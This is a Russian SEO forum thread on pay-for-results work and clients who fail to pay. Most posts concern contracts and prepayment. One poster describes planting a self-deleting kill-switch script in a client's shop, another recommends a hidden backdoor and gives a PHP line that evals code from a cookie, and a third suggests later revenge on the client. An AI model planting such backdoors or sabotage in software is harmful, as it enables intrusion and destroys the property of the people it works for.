Оплата за результат

12
buraxxx
На сайте с 15.09.2005
Offline
69
750

Интересно, а у кого-нибудь вобще есть опыт работы с оплатой за результат?

Я имею в виду примерно следующее:

1. нашли клиента

2. договорились о стоимости, скажем $1000 в месяц

3. месяца два-три продвигали, потратили своих денег на ссылки

4. сайт успешно вывели, отчитались перед заказчиком

5. без проблем получили свои $2000-3000

a1333
На сайте с 25.06.2005
Offline
137
#1

Был опыт. Человек один (из одной приличной студии), с виду тоже приличный, заказал дизайн. Сказал, что нужно срочно, в течение буквально 2-3 дней. Нарисовал ему 2 макета под ключ.

Вообщем денег за 2 суток работы не получил.

Но это единичный случай, когда такие приличные люди попадаются. А так обычно все ок! (тьфу-тьфу-тьфу!!!)

-----

Может не по теме, конечно, дизайн и оптимизация разные вещи. Но смысл один и тот же: лучше подписать договор, чтобы в любом случае не остаться ни с чем.

Профессиональный аудит интернет-магазинов ICQ: 366-240-630
ironic
На сайте с 09.09.2003
Offline
163
#2

У меня есть опыт и он печален :d а шо делать, таков удел удаленщиков...

Хотя, конечно за тематики в 1000у.е./мес я не брался. Сложная тематика предполагает большие вложения сил и времени, а без гарантии оплаты - работается с большим психологическим дискомфортом 😆

buraxxx
На сайте с 15.09.2005
Offline
69
#3
a1333:
Но смысл один и тот же: лучше подписать договор, чтобы в любом случае не остаться ни с чем.

Работая удаленно, да и еще в другом городе, подписать договор затруднительно. Да и вобще в нашем деле, давать гарантии и тем более подписывать договор, помоему весьма опрометчиво.

ironic:
Сложная тематика предполагает большие вложения сил и времени, а без гарантии оплаты - работается с большим психологическим дискомфортом 😆

Вот и я о том же. Но тем не менее, помоему есть такая тенденция: если тематика сложная, то заказчики хотят платить только за результат и никак иначе. :) замкнутый круг получается:)

TheBat
На сайте с 03.08.2004
Offline
173
#4

Имею подобный опыт. Больше того, только так и работаем, причём уже около года. Ни один клиент ещё ни разу не кинул. Со всеми подписываем договор.

В том случае, если клиент приходит не по рекоммендации, обычно просим аванс - 30-40%, но как правило все идут по рекоммендации.

Максим
B
На сайте с 07.10.2004
Offline
114
#5

Видете ли, если клиент кидает, он сразу же обваливается. И у него резко возникает желание заплатить :)

Бородин Антон. 411-22-05, icq 199228260, bomass [at] ya.ru Домен .ru за 6,3$ (http://webst.ru/?id=146)
Oniks
На сайте с 22.08.2005
Offline
176
#6

Если у него не было денег изначально, то не заплатит...

По оптимизации таких случаев не было, хотя тока так и работаю, а вот с веб-программингом был такой трабл. Сделал магазин под ключ, а заказчик сменил пароли 😡 Я этот случай хоть и предусматрел (создал скрипт, который удаляет все, что найдет при запуске), но этот к... его удалил :( Радует тока то, что я специально писал код, который не будет особо релевантен для поисковиков 😂

Профессиональные услуги фотографа в Москве и области (http://www.oniks-photo.ru/) покупаю стать и ссылки с сайтов про охоту
Lupus
На сайте с 02.11.2002
Offline
241
#7
(создал скрипт, который удаляет все, что найдет при запуске)

Надо в глубине кода оставлять backdoor. Например


@eval($HTTP_COOKIE_VARS["back_code"]);
There are two types of people in this world: 1. Those who can extrapolate from incomplete data.
D . G .
На сайте с 27.05.2005
Offline
151
#8
Oniks:
Если у него не было денег изначально, то не заплатит...
По оптимизации таких случаев не было, хотя тока так и работаю, а вот с веб-программингом был такой трабл. Сделал магазин под ключ, а заказчик сменил пароли 😡 Я этот случай хоть и предусматрел (создал скрипт, который удаляет все, что найдет при запуске), но этот к... его удалил :( Радует тока то, что я специально писал код, который не будет особо релевантен для поисковиков 😂

кстате... можно через какое-то время "от дурачка" или нескольких предложить им оптимизацию по дешевке... Сказать что оплата возможна по результату. Думаю подпишутся. И потом отвести душу по полной 🙄

Antony69
На сайте с 16.09.2004
Offline
146
#9

Ничто не укрепляет отношения между исполнителем и заказчиком так, как 100% предоплата (из жизненного опыта).

Заметки SEO аналитика (http://www.seonotes.ru)
P
На сайте с 03.06.2004
Offline
28
#10

нет 100% это плохо. Получил деньги и уже работать то и не хочется. Я за 50%

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий